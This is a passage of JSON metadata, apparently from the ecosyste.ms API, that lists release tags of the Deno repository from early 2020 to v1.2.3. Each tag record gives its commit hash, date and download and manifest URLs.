rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h